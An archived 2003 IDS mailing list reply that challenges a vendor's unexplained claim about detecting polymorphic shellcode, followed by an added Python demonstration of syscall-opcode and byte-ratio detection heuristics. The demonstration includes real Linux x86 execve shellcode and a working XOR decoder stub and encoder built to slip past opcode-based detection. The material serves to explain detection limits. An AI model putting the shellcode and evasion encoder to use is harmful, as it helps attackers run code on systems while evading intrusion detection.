IDS mailing list archives

Re: Polymorphic Shellcode detection


From: sam stover <sstover () enterasys com>
Date: Fri, 09 May 2003 08:30:46 -0400

OK, vendor vs. vendor alert here.  I'm trying really hard not to act like
another vendor and more like a potential customer, but obviously that's hard
for me.

I'd like to explain how I read this e-mail:

One way to do overflow detection is to search for syscall instructions.
Snort does this and it doesn't work really well (potentially valid reasons in
the original e-mail).

Another way is to check for the number of binary bytes.
ISS does this and it's obsolete for some other (potentially valid) reasons.

Some dude from academia invented a way, but it's too slow.

The only real way to do it is by "sophisticated application anomaly".
This is the best way and Intruvert does it on all their platforms.


Now, you've given fairly technical reasons why everyone else's approach is
invalid or obsolete, but you've neglected to provide the technical backup to
why your approach is the best.  Now you do say that it's been validated by
third parties, but you don't explain WHY your technology is the best.  We
are just expected to take your word for it I guess...

If I were a potential customer, I guess I'd ask:  What is "sophisticated
application anomaly"?  Could you please elucidate?


-- 

Samuel f. Stover
sstover () enterasys com
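The two mechanical heuristics the message summarises (search the payload for syscall instructions; count the non-printable bytes) and what a one-byte XOR encoder does to each, as an added example that is not part of this thread and not code from Snort, ISS, IntruVert or any other product named in it. The x86 opcode encodings are the real ones; the 23-byte execve sample, the jmp/call/pop decoder stub, the key-selection rule and the 0.30 ratio threshold are constructed for the demonstration.

```python
"""Toy versions of two detection heuristics named in the thread, plus a
one-byte XOR encoder to show what a polymorphic payload does to each.

Added example, not code from this thread or from any vendor it names.
Assumptions: the x86 opcode encodings below are the real ones; the sample
shellcode, XOR decoder stub and 0.30 threshold are constructed for the demo.
"""

# Raw encodings a "search for syscall instructions" check would look for
# (Linux x86 int 0x80, x86-64 syscall, sysenter).
SYSCALL_PATTERNS = {
    "int 0x80": b"\xcd\x80",
    "syscall":  b"\x0f\x05",
    "sysenter": b"\x0f\x34",
}

# Constructed sample: the well-known 23-byte Linux/x86 execve("/bin//sh").
SAMPLE_SHELLCODE = (
    b"\x31\xc0"                  # xor eax, eax
    b"\x50"                      # push eax
    b"\x68\x2f\x2f\x73\x68"      # push "//sh"
    b"\x68\x2f\x62\x69\x6e"      # push "/bin"
    b"\x89\xe3"                  # mov ebx, esp
    b"\x50\x53\x89\xe1"          # push eax; push ebx; mov ecx, esp
    b"\xb0\x0b"                  # mov al, 11 (execve)
    b"\xcd\x80"                  # int 0x80
)


def find_syscall_opcodes(payload: bytes) -> list:
    """Heuristic 1: report every offset at which a syscall encoding appears."""
    hits = []
    for name, opcode in SYSCALL_PATTERNS.items():
        off = payload.find(opcode)
        while off != -1:
            hits.append((off, name))
            off = payload.find(opcode, off + 1)
    return sorted(hits)


def binary_byte_ratio(payload: bytes) -> float:
    """Heuristic 2: fraction of bytes that are not printable ASCII or tab/LF/CR."""
    if not payload:
        return 0.0
    nonprint = sum(1 for b in payload
                   if not (0x20 <= b <= 0x7e or b in (0x09, 0x0a, 0x0d)))
    return nonprint / len(payload)


def classify(payload: bytes, ratio_threshold: float = 0.30) -> dict:
    """Run both heuristics; the 0.30 cut-off is an arbitrary demo value."""
    hits = find_syscall_opcodes(payload)
    ratio = binary_byte_ratio(payload)
    return {"syscall_hits": hits, "binary_ratio": round(ratio, 3),
            "flag_syscall": bool(hits), "flag_binary": ratio >= ratio_threshold}


STUB_LEN = 20  # size of the decoder stub built below


def build_decoder_stub(length: int, key: int) -> bytes:
    """x86 jmp/call/pop decoder: XORs `length` bytes after the stub with `key`."""
    if not 0 < length <= 0xff or not 0 <= key <= 0xff:
        raise ValueError("length and key must fit in one byte")
    return (b"\xeb\x0d"                     # jmp short call_decoder
            + b"\x5e"                       # decoder: pop esi  (esi -> body)
            + b"\x31\xc9"                   # xor ecx, ecx
            + bytes([0xb1, length])         # mov cl, LEN
            + bytes([0x80, 0x36, key])      # decode_loop: xor byte [esi], KEY
            + b"\x46"                       # inc esi
            + b"\xe2\xfa"                   # loop decode_loop
            + b"\xeb\x05"                   # jmp short body
            + b"\xe8\xee\xff\xff\xff")      # call_decoder: call decoder


def xor_encode(shellcode: bytes) -> bytes:
    """Pick the lowest key that leaves no NUL and no syscall opcode anywhere
    in stub+body (the bad-byte filter a real encoder applies), and emit it."""
    for key in range(1, 256):
        body = bytes(b ^ key for b in shellcode)
        payload = build_decoder_stub(len(shellcode), key) + body
        if b"\x00" not in body and not find_syscall_opcodes(payload):
            return payload
    raise ValueError("no single-byte key satisfies the constraints")


def emulate_decoder(payload: bytes) -> bytes:
    """Do in Python what the stub does at run time, to prove the round trip."""
    length, key = payload[6], payload[9]
    body = payload[STUB_LEN:STUB_LEN + length]
    return bytes(b ^ key for b in body)


if __name__ == "__main__":
    encoded = xor_encode(SAMPLE_SHELLCODE)
    print("raw:    ", classify(SAMPLE_SHELLCODE))
    print("encoded:", classify(encoded))
    print("round trip ok:", emulate_decoder(encoded) == SAMPLE_SHELLCODE)
```

On the constructed sample the opcode search finds the int 0x80 at offset 21 of the raw payload and nothing at all in the encoded one, because the encoder deliberately chose a key that leaves no syscall pattern anywhere in stub plus body; the byte-ratio check flags both, since a single-byte XOR moves bytes around but does not make a binary blob look like text. Which of the two heuristics survives a given encoder, and at what false-positive cost on legitimate binary traffic, is exactly the kind of detail the message above is asking the vendor to spell out.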


